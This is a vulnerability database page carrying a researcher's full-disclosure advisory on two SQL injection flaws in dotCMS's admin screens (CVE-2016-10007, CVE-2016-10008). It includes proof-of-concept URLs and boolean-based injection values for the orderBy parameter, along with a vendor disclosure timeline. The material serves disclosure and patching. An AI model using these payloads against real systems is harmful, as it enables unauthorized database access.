Vulners
Lucene search
dotCMS SQL Injection
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2016-10007 | 19 Feb 201821:00 | – | cve |
| CVE-2016-10008 | 19 Feb 201821:00 | – | cve |
 | CVE-2016-10007 | 19 Feb 201821:00 | – | cvelist |
| CVE-2016-10008 | 19 Feb 201821:00 | – | cvelist |
 | EUVD-2016-1204 | 7 Oct 202500:30 | – | euvd |
| EUVD-2016-1205 | 7 Oct 202500:30 | – | euvd |
 | CVE-2016-10007 | 19 Feb 201821:29 | – | nvd |
| CVE-2016-10008 | 19 Feb 201821:29 | – | nvd |
 | CVE-2016-10007 | 19 Feb 201821:29 | – | osv |
| CVE-2016-10008 | 19 Feb 201821:29 | – | osv |
10
`Title: Multiple SQL injection vulnerabilities in dotCMS (2x CVE)
Credit: Elar Lang / https://security.elarlang.eu
Vendor/Product: dotCMS (http://dotcms.com/)
Vulnerability: SQL injection
Vulnerable version: before 4.1.1. Theoretically would be fixed in
3.7.2 (not released yet)
CVE: CVE-2016-10007, CVE-2016-10008
# Multiple SQL injections in dotCMS framework.
I had already reported 8 SQL injection vulnerabilities to dotCMS and I
was curious as to how they fixed it.
With checking fixes I found 2 new vulnerabilites but for those I had
to bypass blacklist defence.
## CVE-2016-10007 - "Marketing" > Forms" page,
_EXT_FORM_HANDLER_orderBy parameter
An SQL injection vulnerability in the "Marketing > Forms" screen in
dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_FORM_HANDLER_orderBy parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Marketing > Forms", click
on some column title in the resultset table):
/c/portal/layout?p_l_id=89594b95-1354-4a63-8867-c922880107df&p_p_id=EXT_FORM_HANDLER&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_FORM_HANDLER_struts_action=%2Fext%2Fformhandler%2Fview_form&_EXT_FORM_HANDLER_orderBy=SQLi&_EXT_FORM_HANDLER_direction=asc
Proof-of-Concept values for parameter _EXT_FORM_HANDLER_orderBy.
Precondition for this example: there must be at least 2 different rows
in the resultset and ordering by name and description field should
give different ordering (if they don't, use some other field names)
-- boolean true - output is ordered by name field
_EXT_FORM_HANDLER_orderBy=case when 1=1 then name else description end
-- boolean false - output is ordered by descriotion field
_EXT_FORM_HANDLER_orderBy=case when 1=0 then name else description end
## CVE-2016-10008 - "Content Types > Content Types" page,
_EXT_STRUCTURE_direction parameter
An SQL injection vulnerability in the "Content Types > Content Types"
screen in dotCMS before 3.7.2 (not released) and 4.1.1 allows remote
authenticated attackers to execute arbitrary SQL commands via the
_EXT_STRUCTURE_direction parameter parameter.
Preconditions: the attacker must be authenticated and authorized as an
administrator.
Proof-of-Concept URL (from "Admin Site" UI: "Content Types > Content
Types", click on some column title in the resultset table):
demo.dotcms.com/c/portal/layout?p_l_id=56fedb43-dbbf-4ce2-8b77-41fb73bad015&p_p_id=EXT_STRUCTURE&p_p_action=1&p_p_state=maximized&p_p_mode=view&_EXT_STRUCTURE_struts_action=%2Fext%2Fstructure%2Fview_structure&_EXT_STRUCTURE_orderBy=velocity_var_name&_EXT_STRUCTURE_direction=SQLi
# Vulnerability Disclosure Timeline
2016-10-24 | me > dotCMS | SQLi Poc
2016-10-25 | dotCMS > me | Thanks for PoC
2016-12-19 | me > dotCMS | Informed CVE numbers, asked status for
reported issues.
2016-12-19 | dotCMS > me | Low priority, not planning fixing in next release
2016-12-19 | me > dotCMS | agreed with low priority (requires
authenticated user in administrator privileges)
2017-03-03 | me > dotCMS | I can see many new releases, is it fixed? [2]
2017-03-06 | dotCMS > me | No. Probably will be not addressed until
the project to refactor our admin interface is completed.
2017-06-16 | dotCMS | dotCMS version 4.1.1 release
2017-07-18 | me > dotCMS | As I need to publich CVEs at some point,
what is the status?
2017-07-21 | dotCMS > me | Fixes are available on 4.1.1. Would it be
possible to wait 3 to 4 weeks so we can release 3.7.2?
2017-10-10 | me > dotCMS | "3 to 4 weeks" passed, how it is going with 3.7.2?
2017-10-17 | dotCMS > me | "Thank you for your patience! Thank you for
your email! It prompted me to push the developer to finish getting
this release out the door. I will email you next week with an update."
This "next week" never arrived ;)
2018-02-11 | me | Full Disclosure on http://security.elarlang.eu
# Related fixes and releases
https://dotcms.com/docs/latest/change-log#release-4.1.1
# More detailed (inc some code review and blacklist bypass)
description is available in blog:
https://security.elarlang.eu/cve-2016-10007-and-cve-2016-10008-2-sql-injection-vulnerabilities-in-dotcms-blacklist-defence-bypass.html
--
Elar Lang
Blog @ https://security.elarlang.eu
Pentester, lecturer @ http://www.clarifiedsecurity.com
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Feb 2018 00:00Current
7High risk
Vulners AI Score7
EPSS0.00456